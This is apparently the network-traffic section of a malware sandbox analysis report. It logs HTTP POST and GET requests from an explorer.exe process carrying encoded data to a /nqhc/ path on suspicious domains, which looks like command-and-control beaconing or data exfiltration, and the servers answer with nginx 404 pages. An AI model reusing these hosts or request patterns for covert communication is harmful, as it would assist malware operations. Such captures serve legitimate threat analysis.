                                                                                                                                                                          Dec 5, 2022 15:16:15.324172974 CET11462OUTData Raw: 43 39 53 41 6a 5f 45 54 6e 51 67 76 69 36 28 69 50 32 6b 4e 51 4b 6e 4a 65 56 71 74 47 31 69 4a 67 48 35 6e 46 51 44 31 6f 32 68 62 45 36 4b 33 72 6a 42 62 4e 44 32 4d 50 6a 58 54 78 41 6c 38 34 34 42 32 34 6e 78 31 4f 63 7a 44 6e 6b 39 4a 6a 50
                                                                                                                                                                          Data Ascii: C9SAj_ETnQgvi6(iP2kNQKnJeVqtG1iJgH5nFQD1o2hbE6K3rjBbND2MPjXTxAl844B24nx1OczDnk9JjPcOAnTC~SZmfjEMLIqq5ZDnj8Ug0IWm0-XgYxm0rdi0lWLR1CDhg1aUIMx_I8(DWy8xajfRazlXRVWXLv~FEdDpFEtB5U9aGY~TAmPIZ2HM1835T3afu6HJvMhotywJVIMDAk8a9HrKVzdH5stBXLrVkrAhkH2xEVS
                                                                                                                                                                          Dec 5, 2022 15:16:15.352143049 CET11463INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:15 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                          Dec 5, 2022 15:16:15.352364063 CET11465OUTData Raw: 66 51 44 70 53 51 68 79 4e 51 5a 37 71 44 66 39 55 76 66 34 57 62 46 55 34 68 39 6c 52 38 54 55 73 41 34 39 7a 78 6e 4c 78 50 43 6a 37 69 47 54 59 70 77 43 4c 48 31 52 6b 39 72 4d 6e 41 37 61 34 36 79 4f 42 34 4c 46 51 4c 42 75 36 4f 70 66 48 72
                                                                                                                                                                          Data Ascii: fQDpSQhyNQZ7qDf9Uvf4WbFU4h9lR8TUsA49zxnLxPCj7iGTYpwCLH1Rk9rMnA7a46yOB4LFQLBu6OpfHroWILrGldM3y2LxFOhYjNfczvxtm9(wh6X838KKkhFnUynxIIjWKyYr5w19W7CkxzHBHPq_WQh7OBzfGs3GZTGDOK2iUzHRylxAHifkLpr1Qk3TKu2SfhAJy8hU4Ul69yPe0p1Ex-3oUKtjUBUsZy4DDlJaSd2Pv9T
                                                                                                                                                                          Dec 5, 2022 15:16:15.352364063 CET11471OUTData Raw: 75 62 41 49 4c 6b 68 6a 74 4e 45 4f 74 62 71 49 58 6a 30 76 28 76 46 4f 6b 39 39 72 72 50 78 47 38 54 46 32 41 50 47 79 52 57 34 30 78 5f 42 2d 78 66 39 67 34 32 4f 35 5a 48 45 6b 54 52 51 6b 6d 67 50 4a 32 36 46 6b 32 6a 72 77 55 69 68 47 6e 6b
                                                                                                                                                                          Data Ascii: ubAILkhjtNEOtbqIXj0v(vFOk99rrPxG8TF2APGyRW40x_B-xf9g42O5ZHEkTRQkmgPJ26Fk2jrwUihGnknZejQdiLQ-1Octd6BLSkuGjS8DHf3hYLEup9mLCnAOqOq7IvsB2So1Awf5BJ2RvQEhxthSHkZnKZkhIiF9fQQrr9FTq8htu7Mr5pSyjxd0QoaDJAULPdmHKr24NnGj5MGajKPJhP3VCHWWEENA7oeD7sP8R5Em560
                                                                                                                                                                          Dec 5, 2022 15:16:15.352564096 CET11473OUTData Raw: 33 75 68 45 71 47 5a 39 61 55 5a 4b 6e 67 52 4e 6a 6d 7e 69 54 30 75 6b 42 6f 33 46 50 41 52 6f 68 41 6e 6b 7a 68 41 38 55 6e 38 30 34 64 57 4c 55 50 62 54 39 70 47 6f 79 5f 38 37 52 56 7e 50 79 69 44 53 37 49 74 75 43 6e 38 38 71 6e 47 59 6d 32
                                                                                                                                                                          Data Ascii: 3uhEqGZ9aUZKngRNjm~iT0ukBo3FPARohAnkzhA8Un804dWLUPbT9pGoy_87RV~PyiDS7ItuCn88qnGYm2lRXR9nfrqVHEqNl6sOCnlSSNN8x_mnbEyHP0Ow2Hw84-yXnAEZQIkCd7DPP1ZaeZSg7tTz8DIRMG6b2pg4XmlUARS-Ynr37RvnElAXczCTASL3RL6kkjni5xNkNYeT~_1_18v2I203ltAvNa3ewnu6yG5UyyoIcR1
                                                                                                                                                                          Dec 5, 2022 15:16:15.352667093 CET11480OUTData Raw: 68 66 38 68 43 70 51 72 7a 32 56 71 37 6d 28 58 58 65 63 4b 28 61 6c 31 64 58 72 7a 33 42 71 6d 31 41 6a 6d 69 47 42 4b 34 69 41 32 74 78 5a 42 4a 68 42 4b 4b 41 6a 53 63 78 73 39 59 34 50 67 41 6b 4b 32 55 50 72 53 68 46 59 56 50 74 52 6c 56 61
                                                                                                                                                                          Data Ascii: hf8hCpQrz2Vq7m(XXecK(al1dXrz3Bqm1AjmiGBK4iA2txZBJhBKKAjScxs9Y4PgAkK2UPrShFYVPtRlVatiLCsCDbbCdPa63Fy4lWtB(751KjBpzTKLNkuhMwAbWrCky9ctIFzeAznB(HJdpQYS2aS4nOGkRYTIXWi8kW1Ky80n1hhiFVbrcVw76td2asQjBZ6najNk7wFTWoGCy34CH6FTIdHpBLHfPE6wwlnW0GdyHpCdct4
                                                                                                                                                                          Dec 5, 2022 15:16:15.352761030 CET11482OUTData Raw: 69 49 28 44 76 66 36 73 51 66 37 75 46 44 7e 4f 6d 2d 44 70 51 62 32 62 43 6a 6c 36 42 47 71 38 75 61 61 34 4f 55 7e 61 67 44 28 4a 6d 6d 6f 59 43 30 6c 50 38 31 49 35 71 70 68 77 6f 72 4c 31 41 59 34 62 39 62 7e 4d 54 53 6e 54 46 31 62 53 57 7a
                                                                                                                                                                          Data Ascii: iI(Dvf6sQf7uFD~Om-DpQb2bCjl6BGq8uaa4OU~agD(JmmoYC0lP81I5qphworL1AY4b9b~MTSnTF1bSWzFx7_tBdpkArNxUtVbidL67AgnJ8rvcWf6k9k3srJYXNBWHf59Etc5GTgH8oIXOvpNf2_jjRzYd~G~ZO0ExoDsaJVckGHcqMnJjTp4OZJJjxQn63JMUnBzq6xpSod51Wft-FFJp0is05UgQDuEMjxYFT4RM3bfIsdE
                                                                                                                                                                          Dec 5, 2022 15:16:15.352938890 CET11489OUTData Raw: 44 41 69 4c 32 4f 55 52 42 32 62 57 45 49 51 35 4e 6d 4c 4d 28 62 71 2d 54 76 70 4b 4c 5a 74 47 6a 68 55 50 50 77 46 47 52 45 61 69 52 32 71 4e 7e 7a 7e 32 37 63 4d 4f 58 30 39 39 47 4d 4b 36 46 4d 66 52 61 69 53 70 51 30 4d 4c 48 4b 6e 53 35 50
                                                                                                                                                                          Data Ascii: DAiL2OURB2bWEIQ5NmLM(bq-TvpKLZtGjhUPPwFGREaiR2qN~z~27cMOX099GMK6FMfRaiSpQ0MLHKnS5PGb(R94PnMyPhc3qwqtL3uj3rtApNQ59AOFPp0a6wluR68wlB9In5tQeZEE11CJ4zDrCL5szBmt2iT07cyuvyFkS-eZ2Ojl(kNTh6yl5A0A1jrBfFe4I6ws19aPP4ymi7JM7DoQYmdHkxwKHONtrp1qyN2P9abxDa5
                                                                                                                                                                          Dec 5, 2022 15:16:15.380914927 CET11491OUTData Raw: 6e 32 46 75 51 4b 34 49 5a 2d 71 69 57 59 69 42 7e 35 4e 37 75 54 39 74 48 69 73 31 33 75 4f 5f 41 41 36 52 39 4e 28 67 67 76 74 5a 73 69 66 41 63 70 4e 45 51 59 4e 4c 4e 71 41 75 6d 4e 58 57 4c 37 54 57 6c 56 54 53 32 69 74 5f 4f 76 75 4a 7e 58
                                                                                                                                                                          Data Ascii: n2FuQK4IZ-qiWYiB~5N7uT9tHis13uO_AA6R9N(ggvtZsifAcpNEQYNLNqAumNXWL7TWlVTS2it_OvuJ~XlXrzhz2i6x14x35ov_F2ucqmDOAjzpZlFrA31FHTIzp2DLVrrj1kAsvUkXpmD52MNUUJTDbNysOUqlMGlpnxUq~WcPrfT1oLq3uSopQ4t0SLU5K8rZROOVM4v3BDPL~buka060Jq~sl4ndEiJPtOWygqaht6GsNnR
                                                                                                                                                                          Dec 5, 2022 15:16:15.381007910 CET11502OUTData Raw: 4f 54 39 48 6d 61 7a 59 43 59 64 69 4d 59 6a 58 38 47 34 49 55 2d 57 64 51 31 73 41 56 59 68 51 5a 67 62 53 45 75 53 54 5a 38 7a 57 74 78 49 4a 6d 36 57 52 59 52 6c 67 45 36 4d 56 59 44 47 63 47 4b 71 4f 67 4d 4c 6e 78 31 47 6f 4a 63 28 64 51 61
                                                                                                                                                                          Data Ascii: OT9HmazYCYdiMYjX8G4IU-WdQ1sAVYhQZgbSEuSTZ8zWtxIJm6WRYRlgE6MVYDGcGKqOgMLnx1GoJc(dQa1zovVDCjVsoT(zaNagOlmGKhTzmAPpai9038x3ChKqxb~K3VxQokQdEhprF_hHvMJHd74XnaYoPfFKBYiNkkfGAGg1bpVUQaGBX0Gr8aOo5c~0ph7L83nB1okE1AXsrwWFR_MxTMpHms4KQ6yfnSqGrLbsgUVw5Uz


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          26192.168.11.20498642.57.90.1680C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:17.369810104 CET11503OUTGET /nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IX HTTP/1.1
                                                                                                                                                                          Host: www.botbillionsblaze.website
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          Dec 5, 2022 15:16:17.397447109 CET11504INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:17 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Content-Length: 146
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          27192.168.11.2049866103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:22.994231939 CET11518OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.005404.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 187
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.005404.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.005404.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 58 46 49 31 6d 47 77 6a 77 76 57 45 28 71 69 64 73 79 31 47 77 59 61 71 57 4a 6b 78 73 5a 77 6e 55 58 79 4b 71 4f 43 6e 46 72 4d 51 70 52 4d 57 57 7a 7a 6a 73 71 49 4b 55 5a 49 71 4d 6d 47 44 51 4e 78 79 6e 67 4b 50 28 51 57 6b 4a 62 63 4f 6e 7a 54 63 36 79 70 38 69 4e 46 35 36 59 35 4f 7e 78 7e 4d 45 54 6b 5a 4a 77 46 66 4e 2d 6b 48 4a 33 37 63 41 49 50 71 51 54 66 4a 70 39 53 71 7a 51 4f 4b 7a 34 30 5f 53 65 6c 32 41 42 6f 70 61 46 77 72 4b 42 50 33 4f 57 61 49 67 39 66 74 78 50 42 53 79 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                                                                          Data Ascii: 7nWHV=DwjUP3e1xl1YXFI1mGwjwvWE(qidsy1GwYaqWJkxsZwnUXyKqOCnFrMQpRMWWzzjsqIKUZIqMmGDQNxyngKP(QWkJbcOnzTc6yp8iNF56Y5O~x~METkZJwFfN-kHJ37cAIPqQTfJp9SqzQOKz40_Sel2ABopaFwrKBP3OWaIg9ftxPBSyQ).
                                                                                                                                                                          Dec 5, 2022 15:16:23.246773958 CET11519INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:23 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: W/"634bbb43-6cd"
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0
                                                                                                                                                                          Dec 5, 2022 15:16:23.456300974 CET11521INHTTP/1.1 404 Not Found
                                                                                                                                                                          Server: nginx
                                                                                                                                                                          Date: Mon, 05 Dec 2022 14:16:23 GMT
                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          ETag: W/"634bbb43-6cd"
                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                          Data Raw: 33 61 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 15 cb 6e dc 36 f0 9e af 60 59 d4 92 60 9b 92 d6 bb 89 bb 92 16 88 d3 06 08 10 b8 3d a4 a7 20 07 4a e2 4a 74 b8 a4 40 72 1f f2 62 bf a2 87 fe 42 cf 0d d0 63 3f 27 40 fe a2 43 49 eb 95 0d e7 a0 11 e7 3d c3 79 30 ad ed 4a 2c 5e a4 35 a3 e5 22 5d 31 4b 51 51 53 6d 98 cd f0 1f 1f de 5e 5e e3 70 91 5a 6e 05 5b 4c a3 29 ba 55 16 bd 55 6b 59 a6 61 4f 4c 4d a1 79 63 17 7c e9 4b ba e1 15 b5 4a 93 b5 61 fa 75 c5 a4 25 56 bd 57 05 15 ec bd da 32 fd 86 1a e6 07 84 cb 92 ed 7e 5b fa 38 a7 bc 5c e3 00 65 19 ba 8c 83 7d a9 8a f5 aa 53 72 ee 50 86 bf fe f7 e5 db 5f 7f 7f fb f3 df af ff 7c c1 87 34 1c 5c a5 82 cb cf 48 33 91 61 5e 28 89 91 6d 1b 06 e7 15 ad 58 b8 bb ec 69 b5 66 cb 0c d7 d6 36 f3 30 9c ce 48 3c 99 90 f8 ea 9a 4c 67 e1 12 e2 04 3d 02 00 2f 8e f1 3f 38 df 6a 6e 99 90 be e7 05 c9 86 6a 64 4c e6 a5 25 df 20 5e 66 d8 d4 6a 5b 08 25 99 a9 99 ac 76 9c 3a f7 c6 b6 02 fc d7 8c 57 b5 9d a3 38 8a 7e 4a d0 96 97 b6 3e 22 39 2d 3e 57 da 5d db 65 a1 84 d2 73 a4 ab dc 9f cc 66 17 e8 08 82 04 8d a4 1a 65 b8 e5 4a ce 11 97 70 a0 e2 f8 7f 24 a5 59 c3 28 78 7c 2a 03 59 f1 a5 a6 2b 86 e0 c6 94 80 eb aa 32 dc 32 83 d1 8a ea 8a cb 3e d2 2c 1a d0 2e 54 c0 50 a7 93 2b 5d 32 9d e1 08 f7 39 64 d8 25 74 42 a6 11 70 06 0b 03 cb e8 22 c3 67 3f c6 d1 34 01 18 bf 1c c1 09 9c 67 d7 00 a6 af 8e 60 d6 d1 ae 1c ea 24 a7 3f 3b 34 3a 82 11 2d 76 b4 4e c4 81 91 da ab 04 32 0c fb 14 e1 00 c5 81 32 ba 22 0c 9d 60 d9 ce 86 85 31 78 e1 9a 7b df 97 a2 2b cb 50 23 77 3e e4 aa 6c d1 77 98 89 da 30 bd 14 6a 3b af 79 59 32 e9 9a cf 39 58 78 09 db 50 e1 e3 c7 ed e2 7b f8 dc 98 73 0c 2d 83 83 c4 ea 76 0f f3 f3 4e 5a a6 9d f0 72 2d 0b 57 4c 3f d8 3b d6 83 6a c5 ec af 82 b9 8e bf 69 df 95 60 93 6f 5e 0b 81 03 d2 b9 22 25 37 8d a0 6d 86 25 f4 1b 3e 14 d4 16 b5 cf 82 fd 61 a9 b4 ef 3a 93 67 51 c2 d3 07 73 2e 1f 52 d4 5c 94 9a 49 22 a0 3f 6d 9d f0 f3 f3 de ab 53 b0 b4 92 50 e1 ec 79 95 8f fc 13 01 89 5b 90 e8 1a 7f d5 42 c7 7f 5f 94 97 09 cc bc 13 fa a1 9f c3 5f f8 26 c6 67 67 03 e5 b9 49 19 8d f8 a3 60 9d e7 67 73 1e 25 7d 38 5c 40 d5 82 11 e5 b4 0f 86 bd 30 be 68 97 40 de 9c c2 2f 34 4c 0a 1b ae db f7 7a 8d 61 c2 8b b5 fe 5d 2b ab 60 34 b3 2d 2c 27 b5 25 02 96 96 2b 19 69 06 06 81 5a 70 eb 7b 73 2f f8 18 7d 72 99 8f b5 b2 cc 73 9b c6 78 c1 3e 6f 88 1b 87 1e 87 d5 73 7f 4f f2 d2 58 b0 56 90 42 ad 42 b7 bb cc 3a 5f 71 1b 36 6b 53 93 3b e3 25 07 26 0c 7b a4 09 8a 1d f7 be a6 d2 7d 15 e9 76 65 67 e1 a4 d6 ad a7 53 8e a7 7e 32 37 ed 87 be 92 3e ee 53 c5 5d d8 86 34 14 9a c3 de aa 92 c1 1a 86 2d 6d 6f 18 b4 13 f3 f3 e6 c2 04 c9 21 f0 83 e4 e9 bd 8e 87 ea 8e 6e e8 60 10 75 53 df a5 0d d1 de 99 6e e9 1b 32 8b 89 a0 e1 24 9e be 8c 67 57 31 a4 e7 46 f5 b8 b8 c3 ee 95 79 91 ba ea c3 af 80 50 98 5e a4 75 fc f4 6d 01 4a 1a 0e 6c 78 9b 40 66 40 24 ac af dd 88 15 0e a6 c2 ee 19 fb 1f 05 e9 27 15 cd 06 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                          Data Ascii: 3adun6`Y`= JJt@rbBc?'@CI=y0J,^5"]1KQQSm^^pZn[L)UUkYaOLMyc|KJau%VW2~[8\e}SrP_|4\H3a^(mXif60H<Lg=/?8jnjdL% ^fj[%v:W8~J>"9->W]esfeJp$Y(x|*Y+22>,.TP+]29d%tBp"g?4g`$?;4:-vN22"`1x{+P#w>lw0j;yY29XxP{s-vNZr-WL?;ji`o^"%7m%>a:gQs.R\I"?mSPy[B__&ggI`gs%}8\@0h@/4Lza]+`4-,'%+iZp{s/}rsx>osOXVBB:_q6kS;%&{}vegS~27>S]4-mo!n`uSn2$gW1FyP^umJlx@f@$'0


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                          28192.168.11.2049868103.63.2.17580C:\Windows\explorer.exe
                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                          Dec 5, 2022 15:16:25.263375044 CET11522OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                          Host: www.005404.com
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Content-Length: 527
                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                          Origin: http://www.005404.com
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Accept: */*
                                                                                                                                                                          Referer: http://www.005404.com/nqhc/
                                                                                                                                                                          Accept-Language: en-US
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Data Raw: 37 6e 57 48 56 3d 44 77 6a 55 50 33 65 31 78 6c 31 59 56 6c 59 31 32 56 59 6a 79 50 57 48 36 71 69 64 6d 53 30 4e 77 59 57 71 57 4e 39 38 73 73 6f 6e 58 79 4f 4b 34 61 75 6e 45 72 4d 51 6e 78 4d 58 53 7a 79 68 73 71 31 71 55 63 6f 71 4d 6d 43 44 57 34 6c 79 77 67 4b 51 78 77 57 6e 66 72 63 4c 74 54 53 64 36 79 74 61 69 50 35 35 37 70 56 4f 28 7a 6d 4d 41 47 51 65 44 77 45 61 47 65 6b 41 48 58 37 53 41 49 79 66 51 58 54 7a 70 49 53 71 32 41 75 4b 68 49 30 38 59 75 6c 39 4e 68 70 4c 58 46 55 6e 4b 42 6e 4b 5a 6c 37 31 6b 2d 71 65 77 66 4d 4e 71 41 37 71 49 66 37 6c 39 39 4c 5f 68 50 68 30 4b 51 28 55 62 42 4f 6a 50 74 7a 76 5a 34 6d 42 55 48 49 54 68 36 38 72 50 68 59 4e 33 52 5a 78 54 6d 28 56 30 78 78 43 4f 35 41 56 4c 63 4b 79 70 33 4a 71 39 79 45 30 53 48 35 4e 43 4f 51 5f 61 69 34 38 56 4b 6d 4b 32 34 7e 6e 61 43 50 35 4b 57 55 52 74 35 66 43 4b 51 4d 2d 53 45 58 6a 35 72 33 4b 67 70 72 6c 55 66 28 45 66 36 45 5a 6e 70 6d 66 58 37 73 79 48 78 59 53 50 43 57 2d 51 58 46 73 36 38 72 47 79 62 68 43 72 6a 72 56 6a 4f 4b 63 49 4c 33 33 56 35 52 5a 74 50 39 72 4b 31 6e 50 50 32 69 49 79 61 72 6f 42 53 58 72 75 4d 4f 6a 66 42 73 56 4e 47 6a 43 6e 63 6e 61 31 72 45 6a 79 45 58 43 73 47 57 47 73 6d 74 36 38 58 63 56 30 63 4e 37 66 30 4c 75 50 52 62 66 38 58 35 65 51 45 69 6b 56 48 58 55 34 36 44 39 6d 4c 4a 4b 48 39 74 32 51 4e 6f 75 4c 46 41 6f 32 57 78 6f 66 46 47 6f 4f 5f 37 4b 45 32 41 73 30 66 67 58 34 33 6f 6f 4a 58 49 77 74 48 70 56 50 5f 59 32 46 6c 7a 71 59 49 45 76 6c 6b 36 73 47 31 30 46 43 76 5a 6c 79 41 63 49 4c 46 70 58 44 6c 74 47 32 37 45 2e 00 00 00 00 00 00 00 00
